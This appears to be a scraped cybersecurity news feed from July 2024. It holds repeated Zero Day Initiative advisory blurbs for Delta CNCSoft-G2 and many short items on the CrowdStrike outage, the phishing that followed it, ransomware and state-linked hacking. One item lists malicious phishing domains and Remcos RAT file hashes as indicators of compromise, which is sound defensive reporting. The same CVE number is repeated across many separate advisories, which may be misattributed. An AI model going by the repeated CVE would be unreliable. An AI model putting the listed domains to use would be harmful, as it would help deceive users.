This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-930: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-929: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-928: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-927: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-926: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-925: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-924: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-923: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-922: Delta Electronics CNCSoft-G2 CMT File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-921: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-920: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-919: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-918: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-917: Delta Electronics CNCSoft-G2 ALM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-21 13:31:24

Security Affairs Malware Newsletter – Round 3

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Hardening of HardBit    10,000 Victims a Day: Infostealer Garden of Low-Hanging Fruit This Meeting Should Have Been an Email   Ransomware Detection Model Based on Adaptive Graph Neural Network Learning SEXi ransomware rebrands to APT INC, continues […]

by Security Affairs

2024-07-20 21:31:00

Cybercriminals Exploit CrowdStrike Update Mishap to Distribute Remcos RAT Malware

Cybersecurity firm CrowdStrike, which is facing the heat for causing worldwide IT disruptions by pushing out a flawed update to Windows devices, is now warning that threat actors are exploiting the situation to distribute Remcos RAT to its customers in Latin America under the guise of providing a hotfix. The attack chains involve distributing a ZIP archive file named ""crowdstrike-hotfix.zip,""

by The Hacker News

2024-07-20 18:00:00

Unpacking how Alphabet’s rumored Wiz acquisition could affect VC

Alphabet, the parent company of Google, is in advanced talks to acquire cybersecurity startup Wiz for $23 billion, the Wall Street Journal reported on Sunday. TechCrunch’s sources heard similar and added that deal discussions could last into next week. If this deal does end up getting done, it would be Alphabet’s largest acquisition yet. It […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-20 17:32:44

🍯 Bee-side 180 - How to be Invisible Online

Silently Install Chrome Extension For Persistence, Google''s open-source Emoji font, DDoSing ruins Domain Reputation, and more...

by Hive Five

2024-07-20 17:01:19

Microsoft says 8.5M Windows devices were affected by CrowdStrike outage

Around 8.5 million devices — less than 1 percent of Windows machines globally — were affected by the recent CrowdStrike outage, according to a Microsoft blog post by David Weston, the company’s vice president of enterprise and OS security. These are the first real numbers released by either Microsoft or CrowdStrike around the scale of […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-20 16:42:40

Threat Actors Exploit Recent CrowdStrike Outage to Ramp Up Suspicious Domain Creation

On July 19th, 2024, CrowdStrike, a leading cybersecurity provider of advanced end-point security detection and protection solutions, released a sensor configuration update to Windows systems. This update contained a logic error that resulted in system crashes and Blue Screen of Death (BSOD) incidents. The faulty software update caused widespread disruptions on Friday, affecting critical services in banks, airlines, hospitals, stock markets, and IT industries globally. On July 20th,2024, CrowdStrike released technical details explaining that a logic error in a channel file caused the BSOD. This buggy channel file was designed to detect newly observed malicious named pipes for identifying standard C2 (Command and Control) frameworks in cyberattacks. CrowdStrike also mentioned conducting a thorough root cause analysis to understand how this logic error occurred. While the entire world is grappling with the outbreak and working to resolve the issues, Threat Actors (TAs) are exploiting this situation to their advantage. Within 24 hours of the incident, TAs created several malicious domains to target individuals/Organizations interested in closely following this incident. The cybersecurity community quickly identified these malicious domains and shared the information via platforms like X (formerly Twitter), LinkedIn, etc. SANS shared a post on X about a domain named ""crowdstrikeclaim.com,"" offering a form for impacted organizations to request a free claim review. The form asks for detailed information, including phone number, first name, last name, and email address. Submitting this personal and organizational data could result in identity theft or unauthorized access to accounts. A well-known security researcher John Hammond shared a post on X about a domain called “crowdstrikebluescreen.com,"" which offers services to affected organizations. Verifying such services is crucial, as engaging with misleading or fraudulent offers could lead to additional operational problems and divert resources and attention away from addressing the original incident. Bernardo Quintero, founder of Virus Total, shared a post on X about TAs exploiting the CrowdStrike incident by distributing malware disguised as a hotfix. The file name suggests that the TAs have created zip domains to distribute the malware. Conclusion: The emergence of malicious domains and fraudulent services illustrates the need for heightened caution and verification when dealing with offers and requests related to security incidents. These threats pose risks of identity theft and unauthorized access and can divert valuable resources and attention from resolving the core problem. Furthermore, the distribution of malware disguised as a hotfix demonstrates the adaptability and persistence of TAs in exploiting current events for their gain. In navigating these challenges, it is essential for organizations to remain alert, verify the legitimacy of any claims or services, and maintain robust security practices to safeguard against such threats. Our Recommendations: Avoid submitting personal or organizational information on sites offering ""free claim reviews"" or other services related to the incident. These may be scams designed to steal sensitive information. Before engaging with any service or offer related to the incident, verify the provider''s legitimacy. Only follow remediation steps and instructions from CrowdStrike''s official support channels. Use updated antivirus and anti-malware tools to scan for and block malicious files or domains. Stay informed about the latest threats and security measures to protect your systems. Educate employees and stakeholders about recognizing and avoiding scams and phishing attempts. Indicators of Compromise (IOCs) Indicator Indicator Type Description crowdstrikeupdate.com Domain Malicious domain crowdstrikefix.zip Domain Malicious domain crowdstrikereport.com Domain Malicious domain crowdstrike-helpdesk.com Domain Malicious domain microsoftcrowdstrike.com Domain Malicious domain crowdstrikeoutage.info Domain Malicious domain crowdstrikebsod.com Domain Malicious domain crowdfalcon-immed-update.com Domain Malicious domain whatiscrowdstrike.com Domain Malicious domain fix-crowdstrike-bsod.com Domain Malicious domain fix-crowdstrike-apocalypse.com Domain Malicious domain crowdstuck.org Domain Malicious domain crowdstriketoken.com Domain Malicious domain crowdstrikefix.com Domain Malicious domain crowdstrikedoomsday.com Domain Malicious domain crowdstrikebluescreen.com Domain Malicious domain crowdstrike0day.com Domain Malicious domain crowdstrike-bsod.com Domain Malicious domain crowdstrike-hotfix.zip Domain Malicious domain crowdstrikeclaim.com Domain Malicious domain 1e84736efce206dc973acbc16540d3e5 fef212ec979f2fe2f48641160aadeb86b83f7b35 c44506fe6e1ede5a104008755abf5b6ace51f1a84ad656a2dccc7f2c39c0eca2   MD5 SHA1 SHA256 crowdstrike-hotfix.zip (Remcos RAT)   The post Threat Actors Exploit Recent CrowdStrike Outage to Ramp Up Suspicious Domain Creation appeared first on Cyble.

by CYBLE

2024-07-20 10:30:00

The Feds Say These Are the Russian Hackers Who Attacked US Water Utilities

Plus: The FBI unlocks the Trump shooter’s phone, a security researcher gets legal threats for exposing hackable traffic lights, and more.

by WIRED Security News

2024-07-20 09:58:00

17-Year-Old Linked to Scattered Spider Cybercrime Syndicate Arrested in U.K.

Law enforcement officials in the U.K. have arrested a 17-year-old boy from Walsall who is suspected to be a member of the notorious Scattered Spider cybercrime syndicate. The arrest was made ""in connection with a global cyber online crime group which has been targeting large organizations with ransomware and gaining access to computer networks,"" West Midlands police said. ""The arrest is part of

by The Hacker News

2024-07-20 00:01:02

Faulty CrowdStrike update causes major global IT outage, taking out banks, airlines and businesses globally

Security giant CrowdStrike said the outage was not caused by a cyberattack, as businesses anticipate widespread disruption. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 23:55:02

US cyber agency CISA says malicious hackers are ‘taking advantage’ of CrowdStrike outage

CISA confirmed the CrowdStrike outage was not caused by a cyberattack, but urged caution as malicious hackers exploit the situation. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 22:37:17

CrowdStrike outage: How your plane, train and automobile travel may be affected

The CrowdStrike outage that hit early Friday morning and knocked out computers running Microsoft Windows has grounded flights globally. Major U.S. airlines including United Airlines, American Airlines and Delta Air Lines have halted flight operations around the world. According to FlightAware, which is tracking the cancellations live, 7% of United Airlines flights, 8% of American […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 22:19:42

Don’t Fall for CrowdStrike Outage Scams

Swindlers are spinning up bogus websites in an attempt to dupe people with “CrowdStrike support” scams following the security firm''s catastrophic software update.

by WIRED Security News

2024-07-19 21:48:25

Sustainability, community engagement, and philanthropy at the Barracuda Championship

With the Barracuda Championship in full swing, we''re pleased to highlight some of the current and past CSR initiatives that we''ve been actively engaged in throughout the years.

by Barracuda

2024-07-19 20:29:47

CrowdStrike Global IT Outage: Time to Reflect on the Process for Security Vendor Updates?

Read The NetSPI Agent’s take on the impact and exploitability of the regreSSHion OpenSSH vulnerability that could lead to unauthenticated RCE. The post CrowdStrike Global IT Outage: Time to Reflect on the Process for Security Vendor Updates?  appeared first on NetSPI.

by NetSPI

2024-07-19 19:59:42

CrowdStrike Phishing Attacks Appear in Record Time

I have been the CEO of an anti-virus software developer. We had a special acronym for catastrophic events like this, a so-called ""CEE"". As in Company Extinction Event.  But first: Our systems and network were not affected and we have no impact from this. Within hours of mass IT outages on Friday, a surge of new domains began appearing online, all sharing one common factor: the name CrowdStrike. As the company grapples with a global tech outage that has delayed flights and disrupted emergency services, opportunistic cybercriminals are quick to exploit the chaos. Numerous websites have surfaced, promising help to those affected by the outage. Names like crowdstriketoken[.]com, crowdstrikedown[.]site, crowdstrikefix[.]com, were identified by a UK-based cybersecurity researcher specializing in credential phishing. These new domains were registered and designed in record time to lure in people desperate to restore their systems. While phishing sites commonly emerge following major events, the scale of Friday’s outages presents a vast field of potential victims. According to the researcher, several sites were still under construction, including crowdstrike-helpdesk[.]com, and crowdstrikeclaim[.]com. Bloomberg reported that he began monitoring the situation around midday in the UK and discovered new domains registered as early as 4:12 a.m. EDT, totaling 28 sites so far. NOTE: the fix is to boot into the Windows “safe mode,” delete the offending file—called C-00000291*.sys—and reboot. Microsoft says 8.5 million devices were impacted, that number represents less than 1% of Windows devices worldwide. The US Cybersecurity and Infrastructure Security Agency (CISA) has already observed threat actors exploiting this incident for phishing and other malicious activities. They urge people to avoid clicking on suspicious links. George Kurtz, CEO of CrowdStrike, said: ""Nothing is more important to me than the trust and confidence that our customers and partners have put into CrowdStrike. As we resolve this incident, you have my commitment to provide full transparency on how this occurred and steps we’re taking to prevent anything like this from happening again."" I know George and I''m sure that CrowdStrike will survive this. But it sure is a massive headache for customers. He said: ""We know that adversaries and bad actors will try to exploit events like this. I encourage everyone to remain vigilant and ensure that you’re engaging with official CrowdStrike representatives. Our blog and technical support will continue to be the official channels for the latest updates.""  Exactly. Warn your users to not get lured onto a scam site and download a fake update. FULL DISCLOSURE: It is exceedingly rare that I buy individual stocks, but I bought CRWD ""on the dip"".

by KnowBe4

2024-07-19 19:36:42

CrowdStrike update at center of Windows “Blue Screen of Death” outage

An enormous IT outage across the world today is not the result of a cyberattack, but rather a faulty update from CrowdStrike.

by Malwarebytes Labs

2024-07-19 19:08:39

CrowdStrike security update leads to widespread outages

A CrowdStrike security update has left thousands of organizations unable to boot their Windows computers.

by ThreatDown

2024-07-19 18:59:48

CrowdStrike’s rivals stand to benefit from its update fail debacle

CrowdStrike competes with a number of vendors, including SentinelOne and Palo Alto Networks but also Microsoft, Trellix, Trend Micro and Sophos, in the endpoint security market. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 18:44:23

IT services provider for UK’s NHS chooses Barracuda for cloud data protection

It’s hard to think of a customer with a more acute need for an advanced, scalable, cloud-based backup solution than The Health Informatics Service, or THIS.

by Barracuda

2024-07-19 18:08:00

Faulty CrowdStrike Update Crashes Windows Systems, Impacting Businesses Worldwide

Businesses across the world have been hit by widespread disruptions to their Windows workstations stemming from a faulty update pushed out by cybersecurity company CrowdStrike. ""CrowdStrike is actively working with customers impacted by a defect found in a single content update for Windows hosts,"" the company''s CEO George Kurtz said in a statement. ""Mac and Linux hosts are not impacted. This is

by The Hacker News

2024-07-19 18:00:00

Two Russian Nationals Plead Guilty in LockBit Ransomware Attacks

Two Russian nationals have pleaded guilty in a U.S. court for their participation as affiliates in the LockBit ransomware scheme and helping facilitate ransomware attacks across the world. The defendants include Ruslan Magomedovich Astamirov, 21, of Chechen Republic, and Mikhail Vasiliev, 34, a dual Canadian and Russian national of Bradford, Ontario. Astamirov was arrested in Arizona by U.S. law

by The Hacker News

2024-07-19 17:58:12

Number of data breach victims goes up 1,000%

The Identity Theft Resource Center has published a report showing a 1,170% increase in compromised data victims compared to the same quarter last year.

by Malwarebytes Labs

2024-07-19 17:53:14

78% of Organizations Are Targets of Ransomware Attacks Two or More Times in Twelve Months

New data puts the spotlight on the frequency and impact of modern ransomware attacks, highlighting the overconfidence organizations are showing in their ability to defend and respond to attacks.

by KnowBe4

2024-07-19 17:52:49

CISA’s Red Team Exercise Shows Value of Phishing, but Misses the Best Recommendation

Phishing is used to completely compromise the victim’s environment after other repeated methods failed.

by KnowBe4

2024-07-19 17:31:13

The CrowdStrike outage is a plot point in a rom-com

There’s a man in Florida right now who wants to propose to his girlfriend while they’re on a beach vacation. He couldn’t get the engagement ring before he flew down from New England, but it didn’t seem like that big of an issue — his girlfriend’s daughter Nicole was planning to join them in Florida […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 17:25:00

What we know about CrowdStrike’s update fail that’s causing global outages and travel chaos

Here''s everything you need to know so far about the global outages caused by CrowdStrike''s buggy software update. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 17:03:43

The Critical Role of Supply Chain Resilience in Today’s Digital Landscape

Businesses must recognize that operational resilience extends beyond cybersecurity; it encompasses the entire supply chain, ensuring that even routine updates do not disrupt operations. The post The Critical Role of Supply Chain Resilience in Today’s Digital Landscape appeared first on Zimperium.

by Zimperium

2024-07-19 16:57:52

Buggy CrowdStrike EDR Update Crashes Windows Systems Worldwide

Though the cybersecurity vendor has since reverted the update, chaos continues as companies continue to struggle to get back up and running.

by Dark Reading

2024-07-19 16:30:00

Safeguard Personal and Corporate Identities with Identity Intelligence

Learn about critical threats that can impact your organization and the bad actors behind them from Cybersixgill’s threat experts. Each story shines a light on underground activities, the threat actors involved, and why you should care, along with what you can do to mitigate risk.  In the current cyber threat landscape, the protection of personal and corporate identities has become vital.

by The Hacker News

2024-07-19 15:42:42

Tech Giants Agree to Standardize AI Security

The Coalition for Secure AI is a consortium of influential AI companies aiming to develop tools to secure AI applications and set up an ecosystem for sharing best practices.

by Dark Reading

2024-07-19 15:28:48

From the Sphere to false cyberattack claims, misinformation runs rampant amid CrowdStrike outage

This serves as an example for how easy it is to spread inaccurate information online during a time of immense global confusion and panic. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 15:28:22

Notorious Chinese Hacker Gang GhostEmperor Re-Emerges After 2 Years

After an extended period underground, the Chinese hackers have added a more sophisticated infection chain and additional EDR evasion techniques.

by Dark Reading

2024-07-19 15:26:44

Worldwide IT Outages: Cybersecurity Experts Weigh In

Today (19th July 2024), outages have been reported across almost every facet of society, from airlines and airports, supermarkets and banking to communication services, NHS and trains. EDR org Crowdstrike said the problem was caused by “a defect found in a single content update for Windows hosts”. Whilst the company have confirmed that it was […] The post Worldwide IT Outages: Cybersecurity Experts Weigh In first appeared on IT Security Guru. The post Worldwide IT Outages: Cybersecurity Experts Weigh In appeared first on IT Security Guru.

by IT Security Guru

2024-07-19 15:12:43

California Is a Battleground for AI Bills, as Trump Plans To Curb Regulation

With the GOP pledging free rein for the new technology and action in Congress stalled, Sacramento is pushing plans to put guardrails on AI.

by ITPro Today

2024-07-19 15:07:04

Exploring Internet traffic during the 2024 U.S. Republican National Convention

This week, the Republican National Convention was hosted in Milwaukee, Wisconsin from July 15 to 18, 2024. We examined traffic shifts and cyberattacks since June 2024 to see how these events have impacted the Internet

by Cloudflare

2024-07-19 14:59:00

Pro-Houthi Group Targets Yemen Aid Organizations with Android Spyware

A suspected pro-Houthi threat group targeted at least three humanitarian organizations in Yemen with Android spyware designed to harvest sensitive information. These attacks, attributed to an activity cluster codenamed OilAlpha, entail a new set of malicious mobile apps that come with their own supporting infrastructure, Recorded Future''s Insikt Group said. Targets of the ongoing campaign

by The Hacker News

2024-07-19 14:57:58

How Utilities and Telcos Are Rationalizing Their Clouds

Forrester''s latest report highlights how these linear asset-intensive industries, although relatively late to public cloud, are now eagerly pursuing its potential.

by ITPro Today

2024-07-19 14:54:16

Global outage of Microsoft clients due to CrowdStrike update | Kaspersky official blog

The CrowdStrike EDR driver update has affected airports, banks and stores around the world.

by Kaspersky

2024-07-19 14:46:19

How One Bad CrowdStrike Update Crashed the World’s Computers

A defective CrowdStrike update sent computers around the globe into a reboot death spiral, taking down air travel, hospitals, banks, and more with it. Here’s how that’s possible.

by WIRED Security News

2024-07-19 14:30:00

DHS Inspector General: Coast Guard Shortcomings Hinder US Maritime Security

Private sector organizations are "hesitant" to seek guidance from the Coast Guard, which isn''t sufficiently equipped to help them yet.

by Dark Reading

2024-07-19 14:24:27

Global Microsoft Meltdown Tied to Bad Crowdstrike Update

A faulty software update from cybersecurity vendor Crowdstrike crippled countless Microsoft Windows computers across the globe today, disrupting everything from airline travel and financial institutions to hospitals and businesses online. Crowdstrike said a fix has been deployed, but experts say the recovery from this outage could take some time, as Crowdstrike''s solution needs to be applied manually on a per-machine basis.

by Krebs on Security

2024-07-19 14:03:38

Google Cloud Ups the Ante on VMware Workload Migration

The hyperscaler said it is offering a cost-effective and flexible way to support VMware cloud workloads.

by ITPro Today

2024-07-19 14:01:47

Trustwave Rapid Response: CrowdStrike Falcon Outage Update

Trustwave is proactively assessing and monitoring our clients who may have been impacted by CrowdStrike’s recently rolled-out update for its Windows users. The critical issue identified with CrowdStrike Falcon may result in a Blue Screen of Death (BSOD) on Windows systems, affecting systems worldwide in the travel, healthcare, finance, and telecommunications firms, according to published reports. 

by SpiderLabs Blog

2024-07-19 14:00:00

In Cybersecurity, Mitigating Human Risk Goes Far Beyond Training

As threat actors get smarter about how they target employees, the onus is on organizations to create a strong line of defense — and the human element is a critical component.

by Dark Reading

2024-07-19 14:00:00

China's APT41 Targets Global Logistics, Utilities Companies

According to Mandiant, among the many cyber espionage tools the threat actor is using is a sophisticated new dropper called DustTrap.

by Dark Reading

2024-07-19 13:00:00

Ransomware Has Outsized Impact on Gas, Energy & Utility Firms

Attackers are more likely to target critical infrastructure industries and, when they do, they cause more disruption and ask higher ransoms, with the median payment topping $2.5 million.

by Dark Reading

2024-07-19 12:54:00

APT41 Infiltrates Networks in Italy, Spain, Taiwan, Turkey, and the U.K.

Several organizations operating within global shipping and logistics, media and entertainment, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. have become the target of a ""sustained campaign"" by the prolific China-based APT41 hacking group. ""APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims'' networks since

by The Hacker News

2024-07-19 12:50:00

Summary of "AI Leaders Spill Their Secrets"" Webinar

Event Overview The ""AI Leaders Spill Their Secrets"" webinar, hosted by Sigma Computing, featured prominent AI experts sharing their experiences and strategies for success in the AI industry. The panel included Michael Ward from Sardine, Damon Bryan from Hyperfinity, and Stephen Hillian from Astronomer, moderated by Zalak Trivedi, Sigma Computing''s Product Manager. Key Speakers and Their

by The Hacker News

2024-07-19 12:43:00

SolarWinds Patches 8 Critical Flaws in Access Rights Manager Software

SolarWinds has addressed a set of critical security flaws impacting its Access Rights Manager (ARM) software that could be exploited to access sensitive information or execute arbitrary code. Of the 13 vulnerabilities, eight are rated Critical in severity and carry a CVSS score of 9.6 out of 10.0. The remaining five weaknesses have been rated High in severity, with four of them having a CVSS

by The Hacker News

2024-07-19 11:23:37

CrowdStrike Update Halts the Systems: CyberSpace Ripple Effect

1.CrowdStrike Windows Outage: What Happened? A recent CrowdStrike update caused severe disruptions, including high CPU usage on macOS systems and the Blue Screen of Death (BSOD) on Windows systems. These issues affected hundreds of systems globally, leading to operational standstills in various sectors, including broadcasting, aviation, and transportation. 2. When Did the Disruption Occur? The […] The post CrowdStrike Update Halts the Systems: CyberSpace Ripple Effect appeared first on ThreatMon Blog.

by ThreatMon

2024-07-19 11:20:00

Tenable Customer Update about CrowdStrike Incident

Please read this important customer update about CrowdStrike''s recent incident.Saturday, July 20, 2024As of 5:45 am ET this morning, we have implemented a fix for the CrowdStrike incident and are monitoring to ensure it resolved all associated issues.###Friday, July 19, 202412:21 pm ET UpdateFollowing the recent CrowdStrike update, we are aware that some of our Tenable Identity Exposure customer platforms on Microsoft Azure have been affected. The incident does not prevent users from accessing their console and reviewing the results of the previous scan. Only the real-time monitoring is impacted. Similarly, new Identity Exposure data in Tenable One is not available.We are working to quickly restore this service and will publish updates on our dedicated incident web portal.In the meantime, we can confirm that all of our other Tenable solutions are not impacted and working as they should. ###Friday, July 19, 202410:15 am ETFollowing the recent CrowdStrike update, we are aware that some of our Tenable Identity Exposure customer platforms on Microsoft Azure have been affected. The incident does not prevent users from accessing their console and reviewing the results of the previous scan. Only the real-time monitoring is impacted. Similarly, Identity Exposure data in Tenable One is not available.We are working to quickly restore this service and will publish updates on our dedicated incident web portal.In the meantime, we can confirm that all of our other Tenable solutions are not impacted and working as they should. 

by Tenable

2024-07-19 11:00:00

Master IT Compliance: Key Standards and Risks Explained

The job of an IT professional extends beyond technology to include navigating complex and evolving regulatory requirements.

by ITPro Today

2024-07-19 10:17:40

Extraordinary IT Outage Hobbles Business Around the Globe

A cybersecurity vendor’s threat-monitoring product is causing Microsoft’s Windows operating system to crash.

by ITPro Today

2024-07-19 10:05:37

CrowdStrike software update at the root of a massive global IT outage

A defective software update led to major disruptions in aviation, banking and other industries as Microsoft 365 services were impacted worldwide.

by Cybersecurity Dive

2024-07-19 09:37:00

WazirX Cryptocurrency Exchange Loses $230 Million in Major Security Breach

Indian cryptocurrency exchange WazirX has confirmed that it was the target of a security breach that led to the theft of $230 million in cryptocurrency assets. ""A cyber attack occurred in one of our [multi-signature] wallets involving a loss of funds exceeding $230 million,"" the company said in a statement. ""This wallet was operated utilizing the services of Liminal''s digital asset custody and

by The Hacker News

2024-07-19 09:04:00

Healthcare is an ‘easy victim’ for ransomware attacks. How hospitals can mitigate the damage.

Limited resources in a highly connected ecosystem can make hospitals vulnerable, but planning ahead and implementing key protections could help thwart attacks.

by Cybersecurity Dive

2024-07-19 09:00:00

Cybersecurity Snapshot: CISA Breaks Into Agency, Outlines Weak Spots in Report, as Cloud Security Alliance Updates Cloud Sec Guidance

CISA’s red team acted like a nation-state attacker in its assessment of a federal agency’s cybersecurity. Plus, the Cloud Security Alliance has given its cloud security guidance a major revamping. Meanwhile, a Google report puts a spotlight on insecure credentials. And the latest on open source security, CIS Benchmarks and much more!Dive into six things that are top of mind for the week ending July 19.1 - CISA’s red team breaches fed agency, details lessons learnedA new, must-read report from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) outlines how the agency’s red team probed a large federal agency’s network, quickly found a way in and stayed undetected for months.The 29-page report details the so-called SilentShield assessment from CISA’s red team, explains what the agency’s security team should have done differently and offers concrete recommendations and best practices you might find worth reviewing.Mimicking the modus operandi of a typical nation-state attacker, CISA’s red team exploited a known vulnerability on an unpatched web server, gaining access to the agency’s Solaris environment. Separately, the red team also breached the network’s Windows environment via a phishing attack. Once inside, the red team was able to exploit other weaknesses, such as unsecured admin credentials, to extend the scope of the breach, which went undetected for five months. At that point, CISA alerted the agency about the SilentShield operation.CISA has authorization to conduct SilentShield assessments, whose purpose is to work with the impacted agency and help its security team strengthen its cyberdefenses.Here’s a brief sampling of the assessed agency’s security weaknesses:Lack of sufficient prevention and detection controls, including an inadequate firewall between its perimeter and internal networks; and insufficient network segmentationFailure to effectively collect, retain and analyze logs, which hampered defensive analysts’ ability to gather necessary informationBureaucratic processes and siloed teamsReliance on flagging “known” indicators of compromise (IOCs) instead of using behavior-based detectionLack of familiarity with the identity and access management system (IAM), which wasn’t tested against credential-manipulation techniques nor were its anomalous-behavior alerts monitoredRecommendations include:Deploy internal and external firewallsImplement strong network segmentationEnroll all accounts in the IAM system, and make sure it’s not vulnerable to credential manipulationCentralize logging and use tool-agnostic detectionTo get more details, read the report, titled “CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth.”For more information about the threat from nation-state cyberattackers:“What CISOs Need to Know About Nation-State Actors” (InformationWeek)“4 Ways to Defend Against Nation-State Attacks” (BankInfoSecurity)“Growing Nation-State Alliances Increase U.S. Cyber Risks” (Government Technology)“Nation-State Hackers Leverage Zero-Day Vulnerabilities to Penetrate MITRE Cybersecurity Research Network” (CPO Magazine)2 - Cloud Security Alliance’s cloud sec guide gets revamped The Cloud Security Alliance (CSA) has given a major makeover to its “Security Guidance for Critical Areas of 